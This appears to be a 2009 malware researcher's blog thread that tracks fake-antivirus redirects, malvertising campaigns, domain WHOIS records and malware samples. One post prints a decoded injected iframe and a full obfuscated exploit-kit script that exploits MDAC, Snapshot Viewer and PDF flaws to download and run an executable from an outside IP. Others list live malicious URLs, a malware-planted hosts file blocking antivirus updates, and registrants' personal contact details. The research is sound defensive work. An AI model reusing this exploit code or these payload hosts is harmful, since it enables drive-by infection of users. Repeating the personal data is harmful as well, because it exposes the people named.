protecteduser.cn/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
live-antivirus-pc-scan.com/2009/1/en/freescan.php?id=[*]

becometrueclick.cn - 78.46.101.234

Registration Date: 2008-12-25 18:49
Name Server: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
*Sponsoring Registrar: 广东时代互联科技有限公司
Administrative Email: promasteryouth@gmail.com

Google Translation : Guangdong era of the Internet Technology Co., Ltd.
Website for this Registrar appears to be www.now.cn

livepcantivirusscan.com - 64.20.38.91 / 69.10.49.193 / 91.211.64.68 / 212.117.164.120

Updated Date: 08-jan-2009
Creation Date: 25-dec-2008
Name Server: SKY.EARTH.ORDERBOX-DNS.COM - SKY.MARS.ORDERBOX-DNS.COM -SKY.MERCURY.ORDERBOX-DNS.COM - SKY.VENUS.ORDERBOX-DNS.COM
Registrar: TODAYNIC.COM, INC.
Name: Valensia M Dobbson - Email: ValensiaM@yahoo.com

protecteduser.cn - 88.198.0.143

Registration Date: 2008-12-25 19:07
Name Server: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
*Sponsoring Registrar: 广东时代互联科技有限公司
Administrative Email: MoiraJonesms@googlemail.com

Google Translation : Guangdong era of the Internet Technology Co., Ltd.
Website for this Registrar appears to be www.now.cn

live-antivirus-pc-scan.com - 89.149.227.196

Updated Date: 05-jan-2009
Creation Date: 25-dec-2008
Name Server: NS1.FREEHOSTNS.COM - NS2.FREEHOSTNS.COM - NS3.FREEHOSTNS.COM
Registrar: TODAYNIC.COM, INC.
Name: Valensia M Dobbson - Email: ValensiaM@yahoo.com

Kimberly

Jan 9 2009, 01:28 AM

<h4>

WARNING: notalwaysright.com - AdECN

</h4>
Be very carefull when visiting notalwaysright.com. No Flash this time but a PDF exploit coming through AdECN. Regular readers will recognize a couple of familiar domains.

Links.

ad2.adecn.com/here.spot?v=2.2;time=[*];spotId=[*];c=0;ms=[*]
cds.adecn.com/adecn/script.js
ads.adsrefer.net/serve/serveiad?atype=b2&pid=[*]
ads.adsrefer.net/serve/showiad?atype=b2&pid=[*]&cid=[*]&tid=[*]
www.eorsnacx.net/placeholder-1138825-1378737393?atype=b2&pid=[*]
www.awltovhc.com/image-3195015-10439665
www.yceml.net/1009/10439665-2.gif
fc.webmasterpro.de/as_noscript.php?name=[*]

Banner.

yceml.net/1009/10439665-2.gif

eorsnacx.net contains an escaped javascript. Decoded we notice a PDF exploit. Below is a snipit of the code.

<h4>

IP details

Kimberly

Jan 9 2009, 06:08 AM

<h4>

Anything goes ...

</h4>
Infected by Antivirus 2009 and seeking assistance or just curious? Google ...
Peek at the links in red boxes, they are leading to another fake online scanner. You will have to kill the IE / FF process to get out of the infernal loop.

Adapting the search will reveal several similar sites.

All the sites you see listed there, have search engines on their site, mainly powered by Ultraseek. The CS.html page used does expect an URL, without it does not work. I have not idea if these are hacked servers or if CS.html is really used by those engines.

DONT follow the link

CODE
cpastar2.cpa.state.tx.us/cs.html?url=//halfstyles-1.com/in.php%3Fn%3D30826q=free+antivirus+2009

CS.html page acts simply as a redirect, location being the appended URL. You can test it yourself by using a safe site as parameter, ex www.microsoft.com
cpastar2.cpa.state.tx.us/cs.html?url=//www.microsoft.com

Complete redirect.

halfstyles-1.com/in.php[*]
4goscan.com/?uid=[*]
new4scan.com/?uid=[*]

halfstyles-1.com - 66.96.130.149

Updated Date: 30-dec-2008
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.IPOWERDNS.COM - NS1.IPOWERWEB.NET
Registrant: Aleks Tleper Valerevich (tlep@mail.ru)

4goscan.com - 78.159.99.52

Updated Date: 27-dec-2008
Registrar: REGTIME LTD.
Name Server: NS1.SITELUTIONS.COM - NS2.SITELUTIONS.COM
Registrant: Aron Jeanene - Email: etilrello@gmail.com

new4scan.com - 78.159.99.52

Updated Date: 27-dec-2008
Registrar: REGTIME LTD
Name Server: NS1.NEW4SCAN.COM - NS1.NEW4SCAN.COM
Registrant: Aron Jeanene - Email: etilrello@gmail.com

Other domains used.

merrytexmas.net - 87.248.163.58
Updated Date: 26-dec-2008

happy2009texmas.com - 87.248.163.58
Updated Date: 01-jan-2009

marker2009.com - 87.248.163.58
Updated Date: 06-jan-2009

Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
NS3.MY2NS.NET - NS4.MY2NS.NET
Registrant: PrivacyProtect.org

Kimberly

Jan 10 2009, 04:59 PM

<h4>

WARNING: Quigley-Simpson being impersonated

</h4>
It has been brought to my attention that malvertizements are being sold using the domain quigley-simpson.net

Upon visiting the site we are redirected to the real Quigley-Simpson - quigleysimpson.com - website as seen below. This ain't the first time that the bad guys are using this trick in order to fool potential buyers.

Let's compare the contact details from both websites. In order to protect privacy details, I will only post a screenshot of the real website contact details. You will notice that both are located on Wilshire Blvd, LA but at a different address and with a different phone number.

Quigley-Simpson - quigleysimpson.com

quigley-simpson.net

Craig Colbert c.colbert@quigley-simpson.net
Quigley-Simpson
6500 Wilshire Blvd, Suite 1100,
Los Angeles, CA 90048
Phone: 213-271-9535
Fax: 323-386-0830

quigley-simpson.net - 94.247.3.17

Updated Date: 17-dec-2008
Creation Date: 17-dec-2008
Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS1.EVERYDNS.NET - NS2.EVERYDNS.NET - NS3.EVERYDNS.NET - NS4.EVERYDNS.NET
Registrant:quigleysimpson
Bagg, Gerald (gbagg@earthlink.net)
Los Angeles, CA 90049-0935
Los Angeles
null,90049-0935
US
Tel. +310.4704753

hostnames sharing ip with a-records

av10antivir.com | hs.3-17.zlkon.lv | livestream-tds.com | thechanell.com

<h4>

Creatives

</h4>
460x60

Campaign.

adclickmate.net/_stat.gif?src=[*]

______________________________

120x600

Campaign.

adclickmate.net/_stat.gif?src=[*]

Other malvertizements featuring Hyundai might be proposed by these imposters. Unfortunately I don't have a sample in my possession for the time being.

Kimberly

Jan 11 2009, 05:45 AM

<h4>

WARNING : Massive redirects from search engines to kagbedorgen.net

</h4>
On Dec 19 2008 and Jan 9 2009 we saw how people got redirected from search results. In the past 24h a high number of weird sites have showed up in google. They are formatted like this:
d[00-09].vjurr[0-6].[***].pl/[number]

Examples:

d06.vjurr4.osa.pl/*
d07.vjurr4.345.pl/*
d06.vjurr2.orge.pl/*

The above screenshot only reflects results when searching for antivirus 2009 redirect. Focussing on vjurr5 for example shows that a huge amount of keywords will appear again, basically searching about anything will yield those sites popping up.

When clicking on such a link, we notice that the pages will load blogger tools.

d06.vjurr4.osa.pl/0109051718js contains an obfuscated script leading to kagbedorgen.net. That site holds an interesting script which will determine if you will be redirected or not based on the search engine names in your referer header. All d[00-09].vjurr[0-6].[***].pl/[number] websites are redirecting to kagbedorgen.net, well at least the fair amount I did check.

As you may notice I got redirected to Antivirus 2009. On another link I got redirected to www.rivasearch.com which Registrar is Directi (why am I not surprised). That "search engine" contains quite some links you'd better not follow.

If you visit those strange sites without the required referer, a blogspot page is displayed. Don't click on any of those links, they all lead to similar d[00-09].vjurr[0-6].[***].pl/[number] websites.

In general, to stay on the safer side either block referer header or right click a link, copy and paste into a new tab.

kagbedorgen.net - 84.16.231.215

Registration Service Provided By: RESELLERCLUB
ns1.kagbedorgen.net
ns2.kagbedorgen.net

www.rivasearch.com - 64.27.21.5

Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Name Server: NS.RIVASEARCH.COM
Name Server: NS0.RIVASEARCH.COM

d06.vjurr4.osa.pl - 78.159.124.180 / d06.vjurr4.orge.pl - 78.159.124.181

inetnum: 78.159.124.128 - 78.159.124.255
netname: RUSTELEKOM

Kimberly

Jan 15 2009, 06:01 PM

<h4>

quigley-simpson.net

</h4>

Back on Jan 10 2008, I did post about malvertizements being distributed by quigley-simpson.net impersonating the legitimate Quigley-Simpson - quigleysimpson.com.

Quigley-Simpson has added a warning to their site alerting about the impersonation. As of today, Directi has taken NO steps to suspend quigley-simpson.net Sandi did discover even more websites on the same IP. - Ref.

Kimberly

Jan 28 2009, 05:40 AM

<h4>

netservice1.net - softwarforgoodusers.cn - premium-antivirus-scan.com

</h4>
More Antivirus 2009 Redirects

netservice1.net/in.cgi?[*]
softwarforgoodusers.cn/soft.php?aid=[*]&d=1&product=XPA&refer=[*]
premium-antivirus-scan.com/2009/1/en/freescan.php?id=[*]

Kimberly

Jan 28 2009, 06:00 AM

<h4>

WARNING: Photobucket

</h4>
WARNING: Photobucket .... How many times have I been writing that already? Well here we go again. A huge number of users started to report redirects to Antivirus 2009 while accessing their albums on photobucket - Ref. I did spot a suspect domain called ads-hyundai.com while accessing my album.

Screenshot in situ.

Banner.

ads-hyundai.com/bdb/Hyundai/sonata_300x250.swf

Campaign.

ads-hyundai.com/?id=20091151518297
ads-hyundai.com/banners/flash-loader.php?src=http%3A%2F%2Fads-hyundai.com%2Fbdb%2FHyundai%2Fsonata_300x250.swf&w=300&h=250&url=http%3A%2F%2Fwww.hyundaiusa.com%2Fvehicle%2Fsonata%2F%3Fcmpgnid%3Dsonata3234523
ads-hyundai.com/banners/flash.css
ads-hyundai.com/banners/flashdetect.js
ads-hyundai.com/bdb/Hyundai/sonata_300x250.swf
ads-hyundai.com/banners/

I highly suspect that the advertising from the screenshot is the culprit for several reasons:

Creation date of the domain.

ads-hyundai.com - 92.48.118.2
Updated Date: 23-jan-2009
Creation Date: 23-jan-2009
Registrar: ANSWERABLE.COM (I) PVT. LTD.
Whois Server: whois.answerable.com
Name Server: NS1.ADS-HYUNDAI.COM - NS2.ADS-HYUNDAI.COM
RegistrantContact Details: PrivacyProtect.org

Sandi did spot a domain called hyundai-inc.com when I did report the impersonation of Quigley-Simpson and my contact did mention a Hyundai advertisement. This time the domain is called ads-hyundai.com … strange coincidence isn’t it?

The URL is similar to osmedlin.com & prolinar.com - example MySpace incident - being baddomain/?id=2008[*]. It simply starts with 2009 because we are in 2009 now and not 2008 anymore.

I didn’t get the full script unfortunately but we have learned since a long time that redirects are always based on geo location and time zones and more recently that you need a correct referrer (which I did have btw). The Flash creative itself, although using an extremely high number of action scripts, *seems* clean at first sight.

Btw, advising people to upgrade their browser software as suggested on the Photobucket forum will NOT prevent these redirects from happening. Scripting is scripting, no matter what browser you use. The only way to prevent this from occuring is to increase your browser security settings for iframes, scripting or simply deny them and block Flash in case the redirect is triggered from inside those.

Initial post: Jan 25 2009 04:51 PM

Kimberly

Jan 29 2009, 12:33 AM

<h4>

banners.exitexchange.com

</h4>
banners.exitexchange.com causing havoc on www.curse.com ? - Link
After 8 pages and over a year ... no comment except "hey get out of the matrix."

Kimberly

Jan 29 2009, 10:55 PM

<h4>

Google cache ...

</h4>
Google cache might protect you sometimes from scripts but not always as we will discover in today’s journey. Google does take snapshots of web pages, it’s an awesome feature when a site is down, it might be an awful experience when a website / forum got hacked …

The current and up to date page has been cleaned up by the board administrators but upon visiting the cached page of the IPB board - IP.Board 2.3.6 © 2009 IPS, Inc for reference - we got 2 lil’ warnings since the malicious iframe was indexed by Google. The first warning did occur because I don’t have Adobe Reader installed on this text box, the second was PG intercepting 2 additional exploits (see below for details).

A very small piece of script had been injected into the forum.

Once decoded we discover the following iframe:

CODE
<script>window.status='Done';document.write('<iframe name=d1d73c914ab src=\'http://58.65.232.25/counter/?'+Math.round(Math.random()*7722)+'54\' width=594 height=13 style=\'display: none\'></iframe>')</SCRIPT>

So let's bump to 58.65.232.25/counter/ and discover what’s awaiting us. The first screenshot below shows a snipit of the array used in the function at the bottom of the JavaScript on that page. An interesting obfuscation technique we saw emerging a couple of months ago is used in this type of scripts. You can find more details about this style of obfuscation here.

Links.

58.65.232.25/counter/?[random]
58.65.232.25/counter/getfile.php?f=pdf
58.65.232.25/counter/getexe.php?h=11
58.65.232.25/counter/getexe.php?h=12
58.65.232.25/counter/getfile.php?f=vispdf

Exploits.

PDF Exploit
Office Snapshot Viewer
MDAC

Script writings.

CODE
<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>

CODE
<object id=xmltarget classid="CLSID:88d969c5-f192-11d4-a65f-0040963251e5"></object>
<script type=
'text/javascript'>function errfuck(){
  return true;
}
window.onerror = errfuck;
function dddec(str){
  cto = "C0lwur9Q1UsJxiMRpfVOTdcoISZ3vjnaFG8Kbht7D2PYqBAyNgmL4k5zX6eWEH";
  cfrom = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890";
  res = "";
  for (i = 0; i < str.length; i ++ ){
    c = str.charAt(i);
    pos = cto.indexOf(c);
    if (pos !=- 1)res += cfrom.charAt(pos);
    else res += c;
  }
  return res;
}
function goMDAC(){
  d8 = 0;
  var Qy29Nd = document.createElement(dddec("1opldu"));
  Qy29Nd.setAttribute("id", dddec("ZrkEmx"));
  Qy29Nd.setAttribute("classid", dddec("dVJQx:gtE6yXX6-6Xb5-44tH-EW5b-HHyHz7ykEv56"));
  try {
    var LoWMFJ = Qy29Nd.CreateObject(dddec("sx1xo.JuwlsS"), '');
    var d8 = 1;
  }
  catch (e){
  }
  try {
    var PEELt6 = Qy29Nd.CreateObject(dddec("hRlVV.bUUVQdsuQ1I"), '');
    var d8 = 1;
  }
  catch (e){
  }
  if (d8 == 1){
    try {
      var JB7Ebp = Qy29Nd.CreateObject(dddec("SJTSVk.ALq2nnK"), '');
      JB7Ebp.open("GET", "http://58.65.232.25/counter/getexe.php?h=11", false);
      JB7Ebp.send();
      LoWMFJ.type = 1;
      LoWMFJ.open();
      LoWMFJ.Write(JB7Ebp.responseBody);
      Frogxa = "..\\S87ekhV.exe";
      LoWMFJ.SaveToFile(Frogxa, 2);
      eval(dddec("Kvvqu6.hRlVVvTld9ul(7w1MTs);"));
      //return 1;

    }
    catch (e){
    }
  }
}
function goPDF(){
  wnd = window;
  while (wnd.parent != wnd)wnd = wnd.parent;
  wnd.location = "getfile.php?f=vispdf";
}
function goSnap(){
  var sfrom = 'http://58.65.232.25/counter/getexe.php?h=12';
  var fuckavo = "SB";
  var x;
  var fuckavp = "SB";
  var obj;
  var fuckavx = "SB";
  var mycars = new Array();
  var fuckava = "SB";
  mycars[0] = "c:/Program Files/Outlook Express/WAB.EXE";
  mycars[1] = "d:/Program Files/Outlook Express/WAB.EXE";
  mycars[2] = "e:/Program Files/Outlook Express/WAB.EXE";
  var objlcx = new ActiveXObject("snpvw.Snapshot Viewer Control.1");
  if (objlcx){
    setTimeout('window.location = "ldap://"', 3000);
    for (xin mycars){
      obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1")var buf1 = sfrom;
      var fuckavg = "SB";
      var buf2 = mycars[x];
      var fuckavj = "SB";
      obj.Zoom = 0;
      obj.ShowNavigationButtons = false;
      obj.AllowContextMenu = false;
      obj.SnapshotPath = buf1;
      try {
        obj.CompressedPath = buf2;
        obj.PrintSnapshot();
      }
      catch (e){
      }
    }
  }
  var fuckavqgga = "SB";
  var fuckavqggxa = "SBd";
}
setTimeout('goMDAC();', 3500);
setTimeout('goSnap();', 1);
try {
  var obj = null;
  obj = new ActiveXObject("AcroPDF.PDF");
  if (!obj){
    obj = new ActiveXObject("PDF.PdfCtrl");
  }
  if (obj){
    document.write(
    "<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
    setTimeout('goPDF();', 5000);
  }
}
catch (e){
  document.write(
  "<iframe src='getfile.php?f=pdf' width=1 height=1 frameborder=0></iframe>");
  setTimeout('goPDF();', 5000);
}
</script>

Special thanks to Moore for tipping me off on this one.

Kimberly

Jan 30 2009, 02:41 AM

<h4>

More Antivirus 2009 tricks & scams

</h4>
Wiki pages, something wonderful when they are not edited by the wrong people. An interesting program on sourceforge.net, some handy links to discover its features and supported formats.

Let’s follow RealMedia support for example. Looks bad isn’t it?

Clicking on any of those links will lead the victim to an obfuscated script at hostinginfive.com or oamm.info

The script bumps us to wovens.info where we stumble on some escaped text.

Decoded:

CODE
<script type ='text/javascript'> try{addlert('welcome!!!');}catch(err){document.write('<sc'+'ript> document.location="http://goscanuser.com/?uid=165" </sc'+'ript>');}; </script>

From there we are thus hitting another online scanner pushing people to download and buy Antivirus 2009. At first sight the page has been edited on 19 January 2009 and the original content is still present on the bottom of the wiki page. Several other pages have been altered in the same way; QuickTime (MOV), OGM, Cue sheet to cite only a few.

Full links.

lienvard.hostinginfive.com/[*].htm
wovens.info/cgi-bin/counter?id=619105&name=&ref=http%3A//mediacoder.sourceforge.net/wiki/index.php/RealMedia
goscanuser.com/?uid=165
fast6scan.com/?uid=165

Network captures from goscanuser.com and fast6scan.com show an interesting point: Via: 1.1 goeasyscan.com:3128 (squid/2.7.STABLE5)

<h4>

IP details

</h4>
free.hostinginfive.com alias *.hostinginfive.com - 208.110.73.35

Domain Name: HOSTINGINFIVE.COM
Registrar: KEY-SYSTEMS GMBH
Whois Server: whois.rrpproxy.net
Name Server: NS3.SHAWNETWORKS.COM - NS4.SHAWNETWORKS.COM
Updated Date: 13-jul-2008
Creation Date: 13-jul-2008

RSP: iDotz.Net - Domain Name Registration Service
owner-contact: P-SHN243
owner-organization: S. Networks
owner-fname: S.
owner-lname: Networks
owner-street: Corliss Ave.
owner-city: Seattle
owner-state: WA
owner-zip: 98103
owner-country: US
owner-phone: 2062550273
owner-fax: 2062550273
owner-email: ebradsha@gmail.com
______________________________

nefuwalt.oamm.info - 209.190.24.3

Domain ID:D20084066-LRMS
Domain Name:OAMM.INFO
Created On:01-Oct-2007 00:39:13 UTC
Last Updated On:01-Oct-2008 22:24:06 UTC
Sponsoring Registrar:Wild West Domains (R213-LRMS)
Registrant ID:GODA-051232321
Registrant Name:Oscar A. Marrero
Registrant Organization:
Registrant Street1:Private
Registrant City:San Juan
Registrant State/Province:PR
Registrant Postal Code:00641
Registrant Country:US
Registrant Phone:+1.7875033881
Registrant Email:marrerooscaralejandro@gmail.com
______________________________

wovens.info - 78.159.118.157

Domain ID:D20978736-LRMS
Domain Name:WOVENS.INFO
Created On:31-Oct-2007 14:52:06 UTC
Last Updated On:27-Dec-2008 20:46:40 UTC
Sponsoring Registrar:Regtime Ltd. (R455-LRMS)
Registrant ID:CO374656-RT
Registrant Name:Daniils Nikiforovs
Registrant Organization:n/a
Registrant Street1:Kalnciema Street 186
Registrant City:Riga
Registrant State/Province:
Registrant Postal Code:1046
Registrant Country:LV
Registrant Phone:+371.27702718
Registrant Email:dophshli@gmail.com
______________________________

goeasyscan.com - 65.55.12.249

Domain Name: GOEASYSCAN.COM
Registrar: REGTIME LTD.
Whois Server: whois.regtime.net
Name Server: NS1.SITELUTIONS.COM - NS2.SITELUTIONS.COM
Updated Date: 19-jan-2009
Creation Date: 19-jan-2009
Registrant: Luther Tilgham
Email: sedxanza@gmail.com
Organization: Private person
Address: Kungsportsavenyn 6
City: Goteborg
State: Goteborg
ZIP: 41136
Country: SE
Phone: +46.317673400
______________________________

goscanuser.com - 66.101.58.54

Domain Name: GOSCANUSER.COM
Registrar: UK2 GROUP LTD.
Whois Server: whois.hostingservicesinc.net
Name Server: NS1.SITELUTIONS.COM - NS2.SITELUTIONS.COM
Updated Date: 28-jan-2009
Creation Date: 28-jan-2009
Registrant: N/A
Robert Pettus (pettus.robert@gmail.com)
553 Churchward St
San Diego
California,92114
US
Tel. +619.2857064
______________________________

fast6scan.com - 66.101.58.54

Registrar: REGTIME LTD.
Whois Server: whois.regtime.net
Name Server: NS1.SITELUTIONS.COM - NS2.SITELUTIONS.COM
Updated Date: 26-jan-2009
Creation Date: 14-jan-2009
Registrant: Alex Kitzmiller
Email: alkitzmiller@gmail.com
Organization: Private person
Address: Zoutelaan 175
City: Knokke-Heist
State: Knokke-Heist
ZIP: 08300
Country: BE
Phone: +32.50611614

Kimberly

Jan 30 2009, 11:42 PM

<h4>

WARNING: smartadserver.net / www.smartadserver.net

</h4>
All content from smartadserver.net / www.smartadserver.net who are trying to impersonate the real SMART AdServer located at www.smartadserver.com should be rejected.
Who is smartadserver.net / www.smartadserver.net?

Pretty clear no? adserver.adtechie.net aka adserver.adtechde.net

References.

smartadserver.net - 124.217.252.104

Updated Date: 05-dec-2008
Creation Date: 18-nov-2008
Name Server: NS1.SMARTADSERVER.NET - NS2.SMARTADSERVER.NET
Registrar: INTERNET.BS CORP.
Registrant
Private Whois Service
*******PLEASE DO NOT SEND LETTERS******
****Contact the owner by email only****
c/o smartadserver.net
N4892 Nassau
Bahamas

Administrative Contact
Private Whois Service
Private Whois Service a1kr590496e7fcab0d7c@ixbmmtt496e7cb584ddb.privatewhois.net
*******PLEASE DO NOT SEND LETTERS******
****Contact the owner by email only****
c/o smartadserver.net
N4892 Nassau
Bahamas
Tel: +1.23456789

Kimberly

Feb 1 2009, 07:08 AM

<h4>

othersideofmoon.cn - antimalware-scanner.com

</h4>
Current Antivirus 2009 / 2010 / 360 Redirects

othersideofmoon.cn/soft.php?aid=[*]&d=1&refer=[*]
antimalware-scanner.com/promo/1/freescan.php?nu=[*]

othersideofmoon.cn - 83.133.126.201

Registration Date: 2009-01-23 18:50
Name Server: ns1.airflysupport.com - ns2.airflysupport.com - ns3.airflysupport.com
Sponsoring Registrar: 广东时代互联科技有限公司
Registrant Organization: null
Administrative Email: matzig@thaitrails.org

antimalware-scanner.com - 195.24.78.186

Updated Date: 31-jan-2009
Creation Date: 29-jan-2009
Name Server: ns1.airflysupport.com - ns2.airflysupport.com - ns3.airflysupport.com
Registrar: TODAYNIC.COM, INC.

Registrant: Moody J Arten
Address: 15 17 Avenue dOstende
City: Monaco
Province/state: NA
Country: MC
Postal Code: 02886
Phone: +3.7793156340
Fax: +3.7793156340
Email: info@monacofactoryprom.com

Kimberly

Feb 2 2009, 12:16 AM

<h4>

clicksovernetwork.cn - antimalware-scanner.com

</h4>
Current Antivirus 2009 /2010 / 360 Redirects

netservice1.net/redirect/
clicksovernetwork.cn/soft.php?aid=[*]&d=1&refer=[*]
antimalware-scanner.com/promo/1/freescan.php?nu=[*]

clicksovernetwork.cn - 83.133.126.201

Registration Date: 2009-01-23 18:51
Name Server: ns1.airflysupport.com - ns2.airflysupport.com - ns3.airflysupport.com
Sponsoring Registrar: 广东时代互联科技有限公司
Registrant Organization: null
Administrative Email: matzig@thaitrails.org

Kimberly

Mar 9 2009, 05:07 PM

<h4>

whereismat.cn - fast-antimalware-scanner.com

</h4>
Current Antivirus 2009 /2010 / 360 Redirects

whereismat.cn/soft.php?aid=[*]&d=1&refer=[*]
fast-antimalware-scanner.com/promo/1/freescan.php?nu=[*]&back=[*]

Kimberly

Mar 11 2009, 07:56 AM

<h4>

Flash.swf & File.exe

</h4>
Flash.swf.

Additional information
File size: 16515 bytes
MD5...: 33c1681a16abfa04013eb65c94161154
SHA1..: 8330926f89b31ab1f30af375d6faa152c85103b6
SHA256: 51dab85fbea24acb490f435d71e026e2c0005a57010ae8fc0f44e5a3a92b3720
packers (Kaspersky): Swf2Swc

File Flash.swf received on 03.09.2009 21:25:00 (CET)

QUOTE
a-squared 4.0.0.101 2009.03.09 -
AhnLab-V3 5.0.0.2 2009.02.27 -
AntiVir 7.9.0.107 2009.03.09 -
Authentium 5.1.0.4 2009.03.09 -
Avast 4.8.1335.0 2009.03.09 -
AVG 8.0.0.237 2009.03.09 -
BitDefender 7.2 2009.03.09 -
CAT-QuickHeal 10.00 2009.03.09 -
ClamAV 0.94.1 2009.03.09 -
Comodo 1039 2009.03.09 -
DrWeb 4.44.0.09170 2009.03.09 -
eSafe 7.0.17.0 2009.03.09 -
eTrust-Vet 31.6.6387 2009.03.09 -
F-Prot 4.4.4.56 2009.03.09 -
F-Secure 8.0.14470.0 2009.03.09 -
Fortinet 3.117.0.0 2009.03.09 -
GData 19 2009.03.09 -
Ikarus T3.1.1.45.0 2009.03.09 -
K7AntiVirus 7.10.664 2009.03.09 -
Kaspersky 7.0.0.125 2009.03.09 -
McAfee 5548 2009.03.09 -
McAfee+Artemis 5548 2009.03.09 -
Microsoft 1.4405 2009.03.09 -
NOD32 3922 2009.03.09 -
Norman 6.00.06 2009.03.09 -
nProtect 2009.1.8.0 2009.03.09 -
Panda 10.0.0.10 2009.03.09 -
PCTools 4.4.2.0 2009.03.09 -
Prevx1 V2 2009.03.09 -
Rising 21.20.02.00 2009.03.09 -
SecureWeb-Gateway 6.7.6 2009.03.09 -
Sophos 4.39.0 2009.03.09 -
Sunbelt 3.2.1858.2 2009.03.08 -
Symantec 1.4.4.12 2009.03.09 -
TheHacker 6.3.3.0.277 2009.03.09 -
TrendMicro 8.700.0.1004 2009.03.09 -
VBA32 3.12.10.1 2009.03.09 -
ViRobot 2009.3.9.1641 2009.03.09 -
VirusBuster 4.5.11.0 2009.03.09 -

Kaspersky: Exploit.SWF.Downloader.mb

Flash Code.

XORED Binary data containing a link to an executable on the same server.

File.exe.

Additional information
File size: 23553 bytes
MD5...: 1bd63d9e587d478d3f372899931d4858
SHA1..: 66a51e05ca85f9b8203d45a4e00c8d3e61400fde
SHA256: cd60755f67a26626b5e26de0e19d101341382bc4c8655be0fd7c9795d4aac96f
ThreatExpert Info

File File.exe received on 03.11.2009 08:30:04 (CET)

QUOTE
a-squared 4.0.0.101 2009.03.11 Packed.Win32.Krap!IK
AhnLab-V3 5.0.0.2 2009.03.11 -
AntiVir 7.9.0.107 2009.03.10 TR/PCK.Krap.I.24
Authentium 5.1.0.4 2009.03.10 -
Avast 4.8.1335.0 2009.03.10 Win32:Trojan-gen {Other}
AVG 8.0.0.237 2009.03.10 I-Worm/Nuwar.AQ
BitDefender 7.2 2009.03.11 Backdoor.Bot.87303
CAT-QuickHeal 10.00 2009.03.11 -
ClamAV 0.94.1 2009.03.11 -
Comodo 1046 2009.03.10 -
DrWeb 4.44.0.09170 2009.03.11 Trojan.Inject.5512
eSafe 7.0.17.0 2009.03.09 Win32.Spam.Mailbot.H
eTrust-Vet 31.6.6388 2009.03.09 -
F-Prot 4.4.4.56 2009.03.10 -
F-Secure 8.0.14470.0 2009.03.11 Packed.Win32.Krap.i
Fortinet 3.117.0.0 2009.03.10 W32/Krap.I!tr
GData 19 2009.03.11 Backdoor.Bot.87303
Ikarus T3.1.1.45.0 2009.03.11 Packed.Win32.Krap
K7AntiVirus 7.10.665 2009.03.10 Packed.Win32.Krap.i
Kaspersky 7.0.0.125 2009.03.11 Packed.Win32.Krap.i
McAfee 5549 2009.03.10 Spam-Mailbot.h.gen.a
McAfee+Artemis 5549 2009.03.10 Spam-Mailbot.h.gen.a
Microsoft 1.4405 2009.03.11 TrojanDownloader:Win32/Bredolab.B
NOD32 3925 2009.03.11 probably a variant of Win32/Kryptik.KF
Norman 6.00.06 2009.03.10 W32/Smalltroj.MFEU
nProtect 2009.1.8.0 2009.03.11 -
Panda 10.0.0.10 2009.03.10 Suspicious file
PCTools 4.4.2.0 2009.03.10 -
Prevx1 V2 2009.03.11 High Risk Worm
Rising 21.20.21.00 2009.03.11 Trojan.Win32.Nodef.fct
SecureWeb-Gateway 6.7.6 2009.03.10 Trojan.PCK.Krap.I.24
Sophos 4.39.0 2009.03.11 -
Sunbelt 3.2.1858.2 2009.03.10 -
Symantec 1.4.4.12 2009.03.11 Trojan Horse
TheHacker 6.3.3.0.278 2009.03.11 -
TrendMicro 8.700.0.1004 2009.03.11 -
VBA32 3.12.10.1 2009.03.11 -
ViRobot 2009.3.11.1644 2009.03.11 Spyware.Krap.Packed.23553.A
VirusBuster 4.5.11.0 2009.03.10 -

Kimberly

Mar 11 2009, 08:35 AM

<h4>

i45.swf - a8.css

</h4>
addFrameScript, yet another interesting method to load malicious content in Flash files.

Obfuscation Techniques

Invalid tags - Tag Type 255 at file byte offset 27
Invalid Images - Tag DefineBits (offset 0x0000001e) does not contain a valid image

Kaspersky: Exploit.SWF.Downloader.hn

a8.css - Trojan-Downloader.Win32.Agent.bkia

Downloaded by i45.swf a8.css installs itself as a driver on the system. Around 20 files are requested from a server in China. A text file named ook.txt containing the same links plus 11 other malicious files is part of the "bundle" you'll get when this critter runs on your computer. Interesting fact, ad.jpg is a hosts file, not an image.

QUOTE
127.0.0.1 v.onondown.com.cn
127.0.0.2 ymsdasdw1.cn
127.0.0.3 h96b.info
127.0.0.0 fuck.zttwp.cn
127.0.0.0 www.hackerbf.cn
127.0.0.0 zzz.2008wyt.net
127.1.1.1 999.2005wyt.com
127.1.1.1 219.152.120.240
127.0.0.0 ww.popdm.cn
127.1.1.1 bbt.etimes888.com
127.1.1.1 219.147.13.53
127.1.1.1 dnl-13.geo.kaspersky.com
127.1.1.1 dl.360safe.com
127.1.1.1 www.sunlight.org.cn
127.1.1.1 w.wonthe.cn
127.1.1.1 20068080.cn
127.1.1.1 l.neter888.cn
127.1.1.1 stat.untang.com
127.1.1.1 www.ikdy.cn
127.0.0.0 geekbyfeng.cn
127.0.0.0 121.14.101.68
127.0.0.0 ppp.etimes888.com
127.0.0.0 www.bypk.com
127.0.0.0 CSC3-2004-crl.verisign.com
127.0.0.1 va9sdhun23.cn
127.0.0.0 udp.hjob123.com
127.1.1.1 999.hfdy2828.com
127.1.1.1 www.hfdy2929.com
127.1.1.1 www.xiazaide1.cn
127.1.1.1 www.vuf51579.cn
127.1.1.1 wm.eo2q.cn
127.1.1.1 d.www-263.com
127.1.1.1 www.ssy1688.cn
127.1.1.1 121.12.173.218
127.1.1.1 qq.18i16.net
127.1.1.1 a.baidu-6661.com
127.1.1.1 www.vuf51579.cn
127.1.1.1 www.1079223105.cn
127.1.1.1 home.xzx6.cn
127.1.1.1 top.fgc3.cn
127.1.1.1 165.246.44.228
127.1.1.1 wwww.ttfafa.com
